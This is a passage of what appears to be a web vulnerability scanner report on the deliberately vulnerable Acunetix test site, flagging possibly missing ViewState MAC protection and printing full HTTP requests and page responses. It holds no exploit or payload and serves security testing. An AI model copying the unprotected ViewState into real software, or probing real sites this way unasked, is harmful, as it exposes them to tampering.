href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Solution Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/Comments.aspx?id=0
Alert tags Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request Request line and header section (322 bytes)
GET http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:18 GMT Content-Length: 13707Response body (13707 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk/TUy" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="58A73C4D" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWWQKDytHbBQKAgcfvBQKFzrr8AQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q9zWSYY5iwxqgBHXlBfPJ/1TT/YMA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>5/16/2019 12:32:30 PM</DIV> <a href="ReadNews.aspx?id=0" id="anchNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a> <DIV id="divNewsShort" class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV> <div id="divComments">User comments: <table id="tblComments" cellspacing="0" cellpadding="0" width="500" border="0"> </table> </div> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <textarea name="tbComment" rows="2" cols="20" id="tbComment" class="CommentTA"></textarea> <input type="submit" name="btnSend" value="Send comment" id="btnSend" /></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Solution Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/default.aspx
Alert tags Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request Request line and header section (316 bytes)
GET http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:17 GMT Content-Length: 13912Response body (13912 bytes)
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit || (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> <DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM <a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM <a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM <a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>Solution Ensure the MAC is set for all pages on this website.
GET http://testaspnet.vulnweb.com/login.aspx
Alert tags Alert description *** EXPERIMENTAL ***
This website uses ASP.NET's Viewstate but maybe without any MAC.
Request Request line and header section (314 bytes)
GET http://testaspnet.vulnweb.com/login.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232Request body (0 bytes)
Response Status line and header section (222 bytes)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Mon, 25 Jul 2022 13:05:17 GMT Content-Length: 13269Response body (13269 bytes)
